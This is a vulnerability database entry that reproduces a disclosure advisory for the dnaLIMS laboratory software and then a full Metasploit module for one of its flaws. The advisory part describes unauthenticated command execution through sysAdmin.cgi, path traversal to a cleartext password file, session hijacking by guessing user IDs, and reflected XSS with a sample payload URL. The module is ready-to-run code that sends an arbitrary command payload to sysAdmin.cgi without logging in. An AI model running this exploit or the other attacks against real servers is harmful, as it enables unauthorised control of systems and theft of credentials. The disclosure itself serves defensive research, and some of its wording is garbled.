Lucene search

K
seebugRootSSV:92931
HistoryApr 10, 2017 - 12:00 a.m.

dnaLIMS Code Execution / XSS / Traversal / Session Hijacking (CVE-2017-6526)

2017-04-1000:00:00
Root
www.seebug.org
24

0.864 High

EPSS

Percentile

98.6%

dnaLIMS Code Execution / XSS / Traversal / Session Hijacking

web-application
Advisory URL:
https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/
Date published: Mar 08, 2017
Vendor: dnaTools, Inc.
CVE IDs: [2017-6526, 2017-6527, 2017-6528, 2017-6529]
USCERT VU: 929263

Vulnerability Summaries

  1. Improperly protected web shell [CVE-2017-6526]
    dnaLIMS requires authentication to view cgi-bin/dna/sysAdmin.cgi, which is
    a web shell included with the software running as the web user. However,
    sending a POST request to that page bypasses authentication checks,
    including the UID parameter within the POST request.

  2. Unauthenticated Directory Traversal [CVE-2017-6527]
    The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated
    directory traversal attack. This allows an unauthenticated attacker to
    retrieve files on the operating system accessible by the permissions of the
    web server. This page also does not require authentication, allowing any
    person on the Internet to exploit this vulnerability.

  3. Insecure Password Storage [CVE-2017-6528]
    An option, which is most likely the default, allows the password file
    (/home/dna/spool/.pfile) to store clear text passwords. When combined with
    the unauthenticated directory traversal vulnerability, it is possible to
    gain the username and password for all users of the software and gain
    complete control of the software.

  4. Session Hijacking [CVE-2017-6529]
    Each user of the dnaLIMS software is assigned a unique four-digit user
    identification number(UID) upon account creation. These numbers appear to
    be assigned sequentially. Multiple pages of the dnaLIMS application require
    that this UID be passed as a URL parameter in order to view the content of
    the page.

Consider the following example:
The URL a http://<SERVER NAME REDACTED>/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410a is a valid URL
to view the page for sequencing requests for the user with the UID of 2410. The
username parameter of the URL is the mechanism for authentication to the
system. The first eight-digit number of the username parameter appears to
be a session identifier as it changes every time the user logs in from the
password.cgi page, however this value is not checked by the seqreq2N.cgi
page. This allows an attacker to guess the four-digit UID of valid user
accounts that have an active session. The user with the UID of 2419
currently has an active session, so we can simply hijack this useras
session by requesting this page and specifying the UID 2419.

  1. Cross-site Scripting
    The seqID parameter of the viewAppletFsa.cgi page is vulnerable to a
    reflected cross site scripting attack via GET request as seen in the
    following URL:
http://<SERVER NAME REDACTED>/cgi-bin/dna/viewAppletFsa.cgi?seqID=7415-7<SCRIPT
Alert("XSS") </SCRIPT>
  1. Cross-site Scripting
    The navUserName parameter of the seqTable*.cgi page is vulnerable to a
    reflected cross site scripting attack via POST request as seen in the
    example below. The * reflects a short name for a client, (ie Shorebreak
    Security may be seqTableSS.cgi or seqTableshorebreak.cgi) and may not be
    vulnerable for all dnaLIMS installs.

  2. Improperly Protected Content

Many of the pages within the admin interface are not properly protected
from viewing by authenticated users. This can give an attacker additional
system information about the system, or change system/software
configuration.

Software was conducted on a live production system, therefore the pages
themselves were tested, forms within these pages were not.

This is also not an exhaustive list of improperly protected pages:

cgi-bin/dna/configuration.cgi

cgi-bin/dna/createCoInfo.cgi

cgi-bin/dna/configSystem.cgi

cgi-bin/dna/combineAcctsN.cgi


                                                require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'dnaLIMS Admin Module Command Execution',
      'Description'    => %q{
          This module utilizes an administrative module which allows for
       command execution.  This page is completely unprotected from any
       authentication when given a POST request.
      },
      'Author'         =>
        [
          'h00die <[email protected]>',  # Discovery, PoC
          'flakey_biscuit <[email protected]>' # Discovery, PoC
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2017-6526'],
          ['US-CERT-VU', '929263'],
          ['URL', 'https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/']
        ],
      'Platform'       => %w( linux unix ),
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'RequiredCmd' => 'perl' # software written in perl, and guaranteed to be there
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 8 2017'
      ))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/'])
      ], self.class
    )
  end
 
  def check
    begin
      res = send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
        'method'    => 'POST',
        'vars_post'  => {
          'investigator' => '',
          'username' => '',
          'navUserName' => '',
          'Action' => 'executeCmd',
          'executeCmdData' => 'perl -V'
        }
      )
      if res && res.body
        if /Summary of/ =~ res.body
          Exploit::CheckCode::Vulnerable
        else
          Exploit::CheckCode::Safe
        end
      else
        Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
 
  def exploit
    begin
      vprint_status('Sending Exploit')
      res = send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'sysAdmin.cgi'),
        'method'    => 'POST',
        'vars_post'  => {
          'investigator' => '',
          'username' => '',
          'navUserName' => '',
          'Action' => 'executeCmd',
          'executeCmdData' => payload.encoded,
        }
      )
      vprint_good(res.body)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end